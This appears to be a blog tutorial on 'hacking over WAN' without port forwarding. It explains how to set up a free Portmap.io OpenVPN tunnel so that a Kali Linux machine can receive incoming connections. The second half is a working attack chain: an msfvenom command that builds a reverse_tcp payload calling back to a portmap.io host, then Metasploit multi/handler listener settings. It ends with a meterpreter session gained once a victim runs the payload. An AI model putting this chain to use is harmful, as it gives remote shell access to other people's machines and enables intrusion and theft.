Since most of the ISP doesn’t provide port forwarding, hacking on WAN has always been a difficult task few years back. Later, SSH tunneling and Premium VPNs came as an alternative for Port Forwarding and it let hackers to hack over WAN.
Ngrok servers as a leading SSH tunneling provider, but the problem with them is they lack persistence. Each time when you reconnect, you’ll be provided with a random subdomain.
To over come this, Serveo.net came with “Unique Subdomain” feature which allowed it’s users to choose their own subdomain. Though, Serveo.net doesn’t reach much as ngrok did.
The problem with paid VPN is their cost. Although they provide port forwarding facility, the cost more. Now, Portmap.io com offers free port mapping configurations that can be used with Open VPN for port forwarding and performing Penetration test over WAN.
Things you’ll need before proceeding :
- Open VPN
- Portmap.io Account
Hack on WAN Without Port Forwarding using Portmap.io :
- Install Open VPN in kali Linux. To install and configure OpenVPN in Kali Linux, click here.
- Now, login to your Portmap.io account.
- After logging in, Click on “Create New Configuration”
- Choose a name for your configuration. (In your free portmap.io plan, you can configure only one mapping, so choose it wise. You’ve to pay and subscribe for more)
- Default type is “Open VPN”
- Change the protocol to “TCP” if it’s in UDP by default.
- Comment if you wish, else leave the box empty.
- Now, click on “Generate” to generate the configuration file
- After generation, Download the configuration file.
- After downloading, click “Create” to create the file. (You can download before creation)
- Now that we have successfully created our configuration file, Navigate to “Mapping Rules” and click “Create a New Rule”
- Now, configure the Rule as given in the image below
- All the values will be filled by default, all you have to do is choose the port to forward.
- In my case, I’ve selected to forward port 4444. You can choose your own.
- After entering the port of your choice, Click on “create” to create the mapping rule.
- In payload creation, “ak-36101.portmap.io” will serve as Lhost and 53723 will serve as Lport.
- Now, to connect to the vpn, type “openvpn <name of config file you have downloaded>
- Ex : openvpn thoatta.port4444.ovpn
- Now, the vpn connection will be initiated and you’ll be connected to the vpn.
- After successful VPN connection, leave the terminal running in the background.
- If you close, the connection will be terminated.
- Now, you’ll be assigned with a new IP address under the Tun0 interface.
- The IP address in the tun0 will be used to create the listener whereas the host name in the mapping rule will be used to create the payload.
- Now in order to create a payload with msfvenom,
- msfvenom -p <payload/reverse_tcp> LHOST=ak-36101.portmap.io LPORT=53723 R > /root/Desktop/payload_name
- After successful payload creation, in order to create listener in Metasploit, type
- use exploit/multi/handler
- set payload <payload/reverse_tcp>
- set lhost <IP of tun0 interface>
- Ex : set lhost 10.9.27.6
- set lport <port you’ve selected in mapping rule>
- Ex : set lport 4444 (In my case, I’ve selected port 4444 to forward in mapping rule)
- Now, the exploit will be successfully launched and you’ll get meterpreter once the payload which you have created has been executed by the victim.
If you have any comments, please leave them in the comment box below and share the article if you like 🙂